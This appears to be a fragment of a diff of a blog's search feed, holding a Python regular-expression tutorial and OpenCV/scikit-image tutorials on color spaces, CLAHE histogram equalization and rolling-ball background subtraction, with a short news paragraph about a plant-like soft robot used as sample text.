    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.\n\nVines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.\n\nIn the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments\n\nThis isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'

Creating your own character sets

[A-Z]: '-' is a metacharacter when used inside [] (a custom character set)

string = 'Hello, There, How, Are, You'
re.findall('[A-Z]', string)  # pulls out all capital letters
['H', 'T', 'H', 'A', 'Y']
re.findall('[A-Z,]', string)
# here we search for any capital letter or a comma
['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y']
string = 'Hello, There, How, Are, You...'
re.findall('[A-Z,.]', string)  # inside [] the . is a literal period, not the any-character wildcard
['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y', '.', '.', '.']
string = 'Hello, There, How, Are, You...'
re.findall(r'[A-Za-z,\s.]', string)  # capitals, lowercase, comma, whitespace, period
    ['H', 'e', 'l', 'l', 'o', ',', ' ', 'T', 'h', 'e', 'r', 'e', ',', ' ', 'H', 'o', 'w', ',', ' ', 'A', 'r', 'e', ',', ' ', 'Y', 'o', 'u', '.', '.', '.']

Quantifiers with custom sets

import re

• + : one or more occurrences
• ? : zero or one occurrence
• * : zero or more occurrences
• {} : a custom number of occurrences

string = 'HELLO, There, How, Are, You...'
re.search('[A-Z]+', string)
<re.Match object; span=(0, 5), match='HELLO'>
re.findall('[A-Z]+', string)
['HELLO', 'T', 'H', 'A', 'Y']
re.findall('[A-Z]{2,}', string)  # 2 or more
['HELLO']
# one or more of the 4 kinds of characters
re.search(r'[A-Za-z\s,]+', string).group()
'HELLO, There, How, Are, You'
re.findall(r'[A-Z]?[a-z\s,]+', string)
['O, ', 'There, ', 'How, ', 'Are, ', 'You']
# ^ is a metacharacter inside brackets: it negates the set
re.search(r'[^A-Za-z\s,]+', string).group()
'...'
re.findall('[^A-Z]+', string)  # matches every run of non-capital characters
    [', ', 'here, ', 'ow, ', 're, ', 'ou...']

GROUPS

• groups allow us to pull out sections of a match and store them

# contrived example
import re
string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'
re.findall(r'[A-Za-z]+ \w+ \d+ \w+', string)
['John has 6 cats', 'Susan has 3 dogs', 'Mike has 8 fishes']
• parentheses denote a group
  • () = metacharacter
re.findall(r'([A-Za-z]+) \w+ \d+ \w+', string)  # to pull out just the names
['John', 'Susan', 'Mike']
re.findall(r'[A-Za-z]+ \w+ \d+ (\w+)', string)  # pull out the animals
['cats', 'dogs', 'fishes']
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
# use the ungrouped pattern first to make sure the match is correct, then add groups to pull out the info you want
[('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
# organize the data by data type
info = re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
info
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]

The Python 3 zip() function

• zip() takes iterables as arguments and packs their corresponding elements into tuples, returning an object made of those tuples, which also saves memory.
• zip(*), the reverse, can be read as unzipping: it transposes the rows and columns of a 2-D structure.

list(zip(*info))  # organize your data by categories
    [('John', 'Susan', 'Mike'), ('6', '3', '8'), ('cats', 'dogs', 'fishes')]
match = re.search(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)  # pulls out three groups
match
<re.Match object; span=(0, 15), match='John has 6 cats'>
match.group(0)
'John has 6 cats'
match.groups()
('John', '6', 'cats')
match.group(1)
'John'
match.group(2)
'6'
match.group(3)
'cats'
match.group(1, 3)  # multiple groups
('John', 'cats')
match.group(3, 2, 1, 1)  # any order, repeats allowed
('cats', '6', 'John', 'John')
match.span()
(0, 15)
match.span(2)
(9, 10)
match.span(3)
(11, 15)
match.start(3)
11
# findall returns a list, which has no group method
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)
AttributeError: 'list' object has no attribute 'group'
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)[0]
('John', '6', 'cats')
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)  # this doesn't work either: tuples have no group method
AttributeError: 'tuple' object has no attribute 'group'
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
[('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
data = re.findall(r'(([A-Za-z]+) \w+ (\d+) (\w+))', string)  # a group of groups
data
[('John has 6 cats', 'John', '6', 'cats'), ('Susan has 3 dogs', 'Susan', '3', 'dogs'), ('Mike has 8 fishes', 'Mike', '8', 'fishes')]
# with findall, indexing is your only option
for i in data:
    print(i[3])
cats
dogs
fishes
it = re.finditer(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
next(it).groups()
('John', '6', 'cats')
it = re.finditer(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
for element in it:
    print(element.group(1, 3, 2))  # don't forget that iterators exhaust
('John', 'cats', '6')
('Susan', 'dogs', '3')
('Mike', 'fishes', '8')
it = re.finditer(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
for element in it:
    print(element.group())
John has 6 cats
Susan has 3 dogs
Mike has 8 fishes
it = re.finditer(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
for element in it:
    print(element.groups())
('John', '6', 'cats')
('Susan', '3', 'dogs')
('Mike', '8', 'fishes')
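Because the comment above warns that iterators exhaust, here is a minimal sketch of what that means, with outputs as comments:

it = re.finditer(r'\w+', 'a b c')
[m.group() for m in it]  # ['a', 'b', 'c']
[m.group() for m in it]  # []: the iterator is already exhausted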

Naming Groups

import re
string = 'New York, New York 11369'
• ([A-Za-z\s]+) the city
• ([A-Za-z\s]+) the state
• (\d+) the zip code
match = re.search(r'([A-Za-z\s]+),([A-Za-z\s]+)(\d+)', string)
match.group(1), match.group(2), match.group(3), match.group(0)
('New York', ' New York ', '11369', 'New York, New York 11369')

?P< > names a group: the group name goes inside the <>, followed by the RE for the group

• (?P<City>)
• (?P<State>)
• (?P<ZipCode>)

pattern = re.compile(r'(?P<City>[A-Za-z\s]+),(?P<State>[A-Za-z\s]+)(?P<ZipCode>\d+)')
match = re.search(pattern, string)
match.group('City'), match.group('State'), match.group('ZipCode')
('New York', ' New York ', '11369')
match.group(1)
'New York'
match.groups()
('New York', ' New York ', '11369')
# just in case you forget the names of the groups you used
match.groupdict()
    {'City': 'New York', 'State': ' New York ', 'ZipCode': '11369'}
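Named groups can also be reused in replacements. A minimal sketch, assuming re.sub and the standard \g<name> replacement syntax, that reorders the matched parts; output shown as a comment:

re.sub(r'(?P<City>[A-Za-z\s]+),(?P<State>[A-Za-z\s]+)(?P<ZipCode>\d+)', r'\g<ZipCode> \g<City>', string)
# '11369 New York'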

Quantifiers on groups

• Using quantifiers on groups has some nuances, but it is very useful

import re

string = 'abababababab'  # ab repeated many times
re.search(r'(ab)+', string)  # (ab)+ is one group matched many times in a row
<re.Match object; span=(0, 12), match='abababababab'>
string = 'abababababab'  # ab repeated many times

re.search(r'[ab]+', string)  # this is different
<re.Match object; span=(0, 12), match='abababababab'>
• difference explained below
  • (ab) means a followed by b
  • [ab] means a or b
string = 'abababbbbbbb'  # only a partial fit for our new string
re.search(r'(ab)+', string)
<re.Match object; span=(0, 6), match='ababab'>
string = 'abababbbbbbb'  # but this pattern fits perfectly
re.search(r'[ab]+', string)
<re.Match object; span=(0, 12), match='abababbbbbbb'>
string = 'abababbbbbbb'  # combining them allows flexibility
re.search(r'(ab)+\w+', string)
<re.Match object; span=(0, 12), match='abababbbbbbb'>
string = 'abababsssss'  # allows flexibility
re.search(r'(ab)+\w+', string)
<re.Match object; span=(0, 11), match='abababsssss'>

Nuances to be wary of

# only one group is captured, not multiple groups
string = 'abababababab'  # original string
match = re.search(r'(ab)+', string)

match.group(1)
# only one group is captured; its value is overwritten on each repetition
'ab'
match.group(2)  # no value
IndexError: no such group
match.groups()  # only one group; it was simply overwritten each time
('ab',)
match.group(0)  # the full match, unrelated to groups
'abababababab'
• Another simple example with two groups using quantifiers
string = 'ababababab'
match = re.search(r'(ab)+(ab)+', string)
match
<re.Match object; span=(0, 10), match='ababababab'>
match.groups()
('ab', 'ab')
match.span(2)  # the first group is greedy, so the second is left with only the final 'ab'
(8, 10)
• Only one group is captured
string = '123456789'

match = re.search(r'(\d)+', string)
match
<re.Match object; span=(0, 9), match='123456789'>
match.groups()  # only one group, and it holds the last value matched
('9',)

Quantifiers with groups within findall

string = '123456789'

re.findall(r'(\d)+', string)
# only the group is pulled out, and only its last instance
['9']
string = '1234 56789'
re.findall(r'(\d)+', string)
# here we have two matches
['4', '9']
re.findall(r'((\d)+)', string)[1][0]
# to get the full match, create a main group engulfing the smaller group
'56789'
# another example
string = 'abbbbb ababababab'
re.findall(r'(ab)+', string)  # two instances
['ab', 'ab']
string = 'abbbbb ababababab'
re.findall(r'((ab)+)', string)  # full match
[('ab', 'ab'), ('ababababab', 'ab')]
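An alternative sketch: re.finditer sidesteps this quirk entirely, because each match object can hand back the full match regardless of the groups in the pattern; output shown as a comment:

string = 'abbbbb ababababab'
[m.group() for m in re.finditer(r'(ab)+', string)]
# ['ab', 'ababababab']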

Groups for word completion

re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Birthday')
<re.Match object; span=(0, 14), match='Happy Birthday'>
re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Valentines')
<re.Match object; span=(0, 16), match='Happy Valentines'>
re.search('Happy Valentines| Happy Birthday | Happy Anniversary', 'Happy Valentines')
<re.Match object; span=(0, 16), match='Happy Valentines'>

Non-capture Groups

# Here is one such example:
import re

string = '1234 56789'
re.findall(r'(\d)+', string)
['4', '9']
re.search(r'(\d)+', string).groups()  # using search
('4',)

A capturing group is a way of treating multiple characters as a single unit; you create one by wrapping characters in parentheses. For example, the regular expression (dog) creates a single group containing the letters "d", "o" and "g". The part of the input string that a capturing group matches is kept in memory, so it can be reused later through a backreference.

With a non-capturing group, the part of the input string the group matches is not kept in memory.

• non-capture group syntax
  • ?: this symbol marks a non-capture group, and it looks slightly similar to the syntax for naming groups
  • ?P<name> is the naming syntax; please don't confuse the two.

# comparison
re.findall(r'(\d)+', string)
['4', '9']
re.findall(r'(?:\d)+', string)  # with a non-capture group
['1234', '56789']
• So the group is part of the pattern, but we don't output the group's results
re.findall(r'\d+', string)
# when the RE has no groups, findall outputs the entire match
['1234', '56789']
# Another example
string = '123123 = Alex, 123123123 = Danny, 123123123123 = Mike, 456456 = rick, 121212 = John, 132132 = Luis,'
# We want to pull out all the names whose IDs are built from repeated 123s
re.findall(r'(?:123)+ = (\w+),', string)  # three instances
['Alex', 'Danny', 'Mike']
# Another example
string = '1*1*1*1*22222 1*1*3333 2*1*2*1*222 1*2*2*2*333 3*3*3*444'
re.findall(r'(?:1\*){2,}\d+', string)
['1*1*1*1*22222', '1*1*3333']
• Non-capture groups don't affect just the findall method;
• they also affect the search and match methods

BE CAREFUL WITH SYNTAX

• ?: correct!
• :? incorrect!

string = '1234 56789'
match = re.search(r'(?:\d)+', string)  # correct syntax
print(match.groups())
()
string = '1234 56789'
match = re.search(r'(:?\d)+', string)  # :? is incorrect syntax: it captures an optional ':' plus a digit
print(match.groups())
('4',)

Summary:

• when we capture groups we are either storing the values or outputting them.

Backreferences - Using captured groups inside other operations

• backreferencing means referring to a captured group within the same regular expression

# syntax and example
re.search(r'(\w+) \1', 'Merry Merry Christmas')  # looking for repeated words
<re.Match object; span=(0, 11), match='Merry Merry'>
re.search(r'(\w+) \1', 'Merry Merry Christmas').groups()
('Merry',)

\1 simply references the first group within the regular expression

'\1' matches whatever the first () group captured. For example, r'(\d)\1' matches two consecutive identical digit characters, such as the 33 in 33aa.

# Another example
re.findall(r'(\w+)', 'Happy Happy Holidays. Merry Christmas Christmas')
['Happy', 'Happy', 'Holidays', 'Merry', 'Christmas', 'Christmas']
re.findall(r'(\w+) \1', 'Happy Happy Holidays. Merry Christmas Christmas')  # we want to look for repeated words
['Happy', 'Christmas']
# another example
re.findall(r'(\w+) \1', 'Merry Merry Christmas Christmas Merry Merry Christmas')
['Merry', 'Christmas', 'Merry']
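Backreferences also work inside re.sub, where \1 in the replacement string refers to the first captured group; a minimal sketch that collapses the repeated words found above, output shown as a comment:

re.sub(r'(\w+) \1', r'\1', 'Merry Merry Christmas Christmas')
# 'Merry Christmas'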
    ]]>
    @@ -9327,7 +9327,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(44-45)-Color%20Spaces/ - 正文

    Tutorial 44 - A note about color spaces in python

    Color spaces

    Color spaces are a way to represent color information present in an image.

    3 popular color spaces are RGB, HSV and LAB.

    import cv2
    from skimage import io
    import matplotlib.pyplot as plt

    color_opencv = cv2.imread('images/Osteosarcoma_01.tif', 1)
    gray_opencv = cv2.imread('images/Osteosarcoma_01.tif', 0)

    color_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
    gray_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=True)

    RGB Color space

    Stores information as Red, Green and Blue channels.

    Additive color model.

Both scikit-image and opencv read color images by default, but opencv stores the color information as BGR rather than RGB.
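Because of that BGR ordering, an OpenCV image usually needs one conversion before matplotlib shows its colors correctly; a minimal sketch using the standard cv2.cvtColor flag (the variable name is illustrative):

rgb_for_plotting = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2RGB)  # swap BGR -> RGB
plt.imshow(rgb_for_plotting)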

    B, G, R = cv2.split(color_opencv)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(B, cmap='gray')
    ax2.title.set_text('B')

    ax3 = fig.add_subplot(223)
    ax3.imshow(G, cmap='gray')
    ax3.title.set_text('G')

    ax4 = fig.add_subplot(224)
    ax4.imshow(R, cmap='gray')
    ax4.title.set_text('R')

    png

    HSV

HSV stores color image information as Hue, Saturation and Value.

HSV separates luma, or the image intensity, from chroma, the color information.

When to use HSV?

For applications where you need to change only pixel intensities and not color information.

e.g. histogram equalization
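A minimal sketch of that idea, brightening only the V channel so hue and saturation stay untouched (the +40 offset is an arbitrary illustration):

hsv = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2HSV)
H, S, V = cv2.split(hsv)
V = cv2.add(V, 40)  # saturating add: values cap at 255 instead of wrapping around
brighter = cv2.cvtColor(cv2.merge((H, S, V)), cv2.COLOR_HSV2BGR)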

    hsv_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2HSV)
    H, S, V = cv2.split(hsv_image)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(H, cmap='gray')
    ax2.title.set_text('H')

    ax3 = fig.add_subplot(223)
    ax3.imshow(S, cmap='gray')
    ax3.title.set_text('S')

    ax4 = fig.add_subplot(224)
    ax4.imshow(V, cmap='gray')
    ax4.title.set_text('V')

    png

    LAB

    LAB expresses color as three values:

    • L - for the lightness (consider this as your grey scale image)

    • A - from green to red

    • B - from blue to yellow

When to use LAB?

Just like HSV, LAB can be used for applications where you need to change only pixel intensities and not the color information.

e.g. histogram equalization

Either HSV or LAB can be used interchangeably for most image processing tasks.
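As a minimal sketch of the LAB route (plain equalization here; the CLAHE variant appears in Tutorial 42), only the lightness channel is touched:

lab = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2LAB)
L, A, B = cv2.split(lab)
L_eq = cv2.equalizeHist(L)  # equalize lightness only; A and B keep the color
equalized = cv2.cvtColor(cv2.merge((L_eq, A, B)), cv2.COLOR_LAB2BGR)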

    lab_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2LAB)
    L, A, B = cv2.split(lab_image)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(L, cmap='gray')
    ax2.title.set_text('L')

    ax3 = fig.add_subplot(223)
    ax3.imshow(A, cmap='gray')
    ax3.title.set_text('A')

    ax4 = fig.add_subplot(224)
    ax4.imshow(B, cmap='gray')
    ax4.title.set_text('B')

    png

    Tutorial 45 - Applying filters designed for grey scale to color images in python

    from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
    from skimage import filters
    from skimage import io
    from matplotlib import pyplot as plt
    from skimage.color import rgb2gray
• Fails on color images, as sobel is a grey-scale filter
• May work with the newest skimage, but it is not clear what it does.
    image = io.imread('images/monalisa.jpg')
    try_to_apply_sobel = filters.sobel(image)
    plt.imshow(try_to_apply_sobel)
    <matplotlib.image.AxesImage at 0x2c0eaaeab50>

    png

    Two ways to apply the filter on color images

• Separate the R, G and B channels, apply the filter to each channel, and put the channels back together.

• Convert RGB to HSV, apply the filter to the V channel, put it back into HSV and convert to RGB.

These tasks take too many lines of code, but with the adapt_rgb decorator they become easy.
@adapt_rgb(each_channel)  # decorator
def sobel_each(image):
    return filters.sobel(image)


@adapt_rgb(hsv_value)
def sobel_hsv(image):
    return filters.sobel(image)
    each_channel_image = sobel_each(image)
    hsv_value_image = sobel_hsv(image)
    plt.imshow(hsv_value_image)
    <matplotlib.image.AxesImage at 0x2c0eab5cb50>

    png

    import cv2


@adapt_rgb(each_channel)
def median_each(image, k):
    output_image = cv2.medianBlur(image, k)
    return output_image

    median_using_cv2 = median_each(image, 13)
    plt.imshow(median_using_cv2)
    <matplotlib.image.AxesImage at 0x2c0eb86fbb0>

    png

    from skimage import exposure


@adapt_rgb(each_channel)
def eq_each(image):
    output_image = exposure.equalize_hist(image)
    return output_image

    equ_RGB = eq_each(image)
    plt.imshow(equ_RGB)
    <matplotlib.image.AxesImage at 0x2c0ec1ef3d0>

    png

@adapt_rgb(hsv_value)
def eq_hsv(image):
    output_image = exposure.equalize_hist(image)
    return output_image

    equ_hsv = eq_hsv(image)
    plt.imshow(equ_hsv)
    <matplotlib.image.AxesImage at 0x2c0ed2423a0>

    png

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image)
    ax1.title.set_text('Input Image')

    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(equ_RGB)
    ax2.title.set_text('Equalized using RGB channels')

    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(equ_hsv)
    ax3.title.set_text('Equalized using v channel in hsv')

    plt.show()

    png

    ]]>
    @@ -9354,7 +9354,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(42-43)-CLAHE/ - 正文

    Tutorial 42 - Histogram equalization and contrast limited adaptive histogram equalization -CLAHE-

    import cv2
    from skimage import io
    import matplotlib.pyplot as plt

    img = cv2.imread('images/sandstone_low_contrast.tif', 1)
    lab_img = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    l, a, b = cv2.split(lab_img)
• numpy.ndarray.flat

  • A 1-D iterator over the array, i.e. the array viewed as if collapsed into one dimension.
• Plot the histogram

    plt.hist(l.flat, bins=100, range=(0, 255))
(array of 100 bin counts, array of 101 bin edges from 0.0 to 255.0, <BarContainer object of 100 artists>)

    png

    • Apply histogram equalization to the L channel

Histogram equalization

• Histogram equalization enhances the contrast of an image by spreading out the pixel histogram values.

    png

• Histogram equalization can produce regions that are too bright or too dark, because the contrast is not limited.
    equ = cv2.equalizeHist(l)
    plt.hist(equ.flat, bins=100, range=(0, 255))
(array of 100 bin counts, array of 101 bin edges from 0.0 to 255.0, <BarContainer object of 100 artists>)

    png

• Combine the histogram-equalized L channel back with the A and B channels
    updated_lab_img1 = cv2.merge((equ, a, b))
    • Convert LAB image back to color (RGB)
    hist_eq_img = cv2.cvtColor(updated_lab_img1, cv2.COLOR_LAB2BGR)

    CLAHE

• Image Enhancement - CLAHE - 知乎
• Contrast Limited Adaptive Histogram Equalization (CLAHE)
  • Adaptive histogram equalization divides the image into small blocks ($8\times8$ tiles by default in opencv).
  • Each block is histogram equalized.
  • To minimize noise amplification, contrast limiting is applied (default 40 in opencv).
    clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8, 8))
    clahe_img = clahe.apply(l)
    plt.hist(clahe_img.flat, bins=100, range=(0, 255))
(array of 100 bin counts, array of 101 bin edges from 0.0 to 255.0, <BarContainer object of 100 artists>)

    png

    updated_lab_img2 = cv2.merge((clahe_img, a, b))
    CLAHE_img = cv2.cvtColor(updated_lab_img2, cv2.COLOR_LAB2BGR)
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Original image')
    ax2 = fig.add_subplot(132)
    ax2.imshow(hist_eq_img, cmap='gray')
    ax2.title.set_text('Equalized image')
    ax3 = fig.add_subplot(133)
    ax3.imshow(CLAHE_img, cmap='gray')
    ax3.title.set_text('CLAHE Image')

    png

    Tutorial 43 - Shading correction using rolling ball background subtraction

    Rolling Ball Background Subtraction - ImageJ

    This plugin tries to correct for uneven illuminated background by using a “rolling ball” algorithm.
    A local background value is determined for every pixel by averaging over a very large ball around the pixel. This value is hereafter subtracted from the original image, hopefully removing large spatial variations of the background intensities. The radius should be set to at least the size of the largest object that is not part of the background.
    This plugin implements (differently) the same algorithm as the one built-in ImageJ in the Process › Subtract background menu, but adds a useful Preview capability. Also, to display the background subtracted in a separate (new) window, hold the ALT key when pressing “OK” (Preview must be off).
    The rolling-ball algorithm was inspired by Stanley Sternberg’s article, “Biomedical Image Processing”, IEEE Computer, January 1983.


• Popular imageJ plugin for background subtraction.

• Only works on 8-bit grey images.

• "Imagine that the 2D grayscale image has a third (height) dimension given by the image value at every point, creating a surface. A ball of given radius is rolled over the bottom side of this surface; the hull of the volume reachable by the ball is the background."

• A great algorithm for particle-detection type applications.

1st approach: Perform CLAHE

• Equalize the light by performing CLAHE on the luminance channel

• The equalization part was already covered in the previous tutorial on CLAHE

• This kind of works, but you can still see shading after the correction.
    import cv2
    import numpy as np

    img = cv2.imread("images/Ti_powder.tif", 1)

    lab_img = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    l, a, b = cv2.split(lab_img)


    clahe = cv2.createCLAHE(clipLimit=3, tileGridSize=(8,8))
    clahe_img = clahe.apply(l)
    CLAHE_img = cv2.merge((clahe_img,a,b))

    corrected_image = cv2.cvtColor(CLAHE_img, cv2.COLOR_LAB2BGR)

    cv2.imshow("Original image", img)
    cv2.imshow("Corrected image", corrected_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    2nd approach:

    • Apply rolling ball background subtraction

      • 应用滚动球背景减法
    • pip install opencv-rolling-ball

    pip install opencv-rolling-ball
Collecting opencv-rolling-ball
  Downloading opencv-rolling-ball-1.0.1.tar.gz (6.2 kB)
Building wheels for collected packages: opencv-rolling-ball
Successfully installed opencv-rolling-ball-1.0.1
Note: you may need to restart the kernel to use updated packages.
    import cv2
    from cv2_rolling_ball import subtract_background_rolling_ball
    from matplotlib import pyplot as plt

    img = cv2.imread("images/Ti_powder.tif", 0)

radius = 20
final_img, background = subtract_background_rolling_ball(img, radius, light_background=True,
                                                         use_paraboloid=False, do_presmooth=True)


# optionally perform CLAHE to equalize the histogram for better segmentation,
# otherwise the image may appear washed out

    clahe = cv2.createCLAHE(clipLimit=3, tileGridSize=(8,8))
    clahe_img = clahe.apply(final_img)

# cv2.imshow("Original image", img)
cv2.imshow("Background image", background)
cv2.imshow("After background subtraction", final_img)
cv2.imshow("After CLAHE", clahe_img)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    ]]>
    + 正文

    Tutorial 42 - Histogram equalization and contrast limited adaptive histogram equalization -CLAHE-

    1
    2
    3
    4
    5
    6
    7
    import cv2
    from skimage import io
    import matplotlib.pyplot as plt

    img = cv2.imread('images/sandstone_low_contrast.tif', 1)
    lab_img = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    l, a, b = cv2.split(lab_img)
    • numpy.ndarray.flat

      • Return a copy of the array collapsed into one dimension.
        • 返回折叠成一维的数组的副本
    • 绘制直方图

    1
    plt.hist(l.flat, bins=100, range=(0, 255))
    (array([    0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,   673.,   450.,         1451.,  4419.,  5375.,  9157.,  6488.,  6910.,  3772.,  3025.,         3818.,  6242.,  7224.,  4729., 14421., 25340., 74157., 44002.,        49095., 14752., 11771.,  3968.,  4044.,  2290.,   627.,   960.,          529.,   722.,   384.,   667.,   612.,  1083.,  2254.,   869.,         7914.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    • Apply histogram equalization to the L channel

    Histogram equalization 直方图均衡化

    • Histogram equalization enhances the contrast of an image by spreading the pixel histogram value.
      • 直方图均衡化通过扩展像素直方图值来增强图像的对比度。

    png

    • Histogram equalization can lead to too bright or dark regions as the contrast is not limited.
      • 直方图均衡化会导致对比不受限制的区域过于明亮或黑暗。
    1
    equ = cv2.equalizeHist(l)
    1
    plt.hist(equ.flat, bins=100, range=(0, 255))
    (array([ 3620.,  3373.,  2415.,  2960.,  3320.,  3508.,  2329.,  3384.,         3104.,  4863.,  2047.,  3772.,  3025.,  3818.,  2083.,  4159.,         2247.,  2386.,  5356.,  1964.,  3496.,  4454.,     0.,  6471.,            0.,     0.,     0., 10157.,     0.,     0.,     0., 15183.,            0.,     0.,     0.,     0.,     0.,     0., 20592.,     0.,            0.,     0.,     0.,     0.,     0.,     0., 25633.,     0.,            0.,     0.,     0.,     0.,     0.,     0., 27932.,     0.,            0.,     0.,     0.,     0., 18417.,     0.,     0.,     0.,            0.,     0.,     0.,     0., 25585.,     0.,     0.,     0.,            0.,     0., 21147.,     0.,     0.,     0.,     0.,     0.,        16077.,     0.,     0., 11871.,     0.,     0.,  8441.,     0.,         6311.,  4639.,  3890.,  3242.,  3968.,  3019.,  3942.,  2595.,         2882.,  2949.,     0.,  7568.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    • Combine the Hist. equalized L-channel back with A and B channels
    1
    updated_lab_img1 = cv2.merge((equ, a, b))
    • Convert LAB image back to color (RGB)
    1
    hist_eq_img = cv2.cvtColor(updated_lab_img1, cv2.COLOR_LAB2BGR)

    CLAHE

    • Image Enhancement - CLAHE - 知乎
• Contrast Limited Adaptive Histogram Equalization (CLAHE)
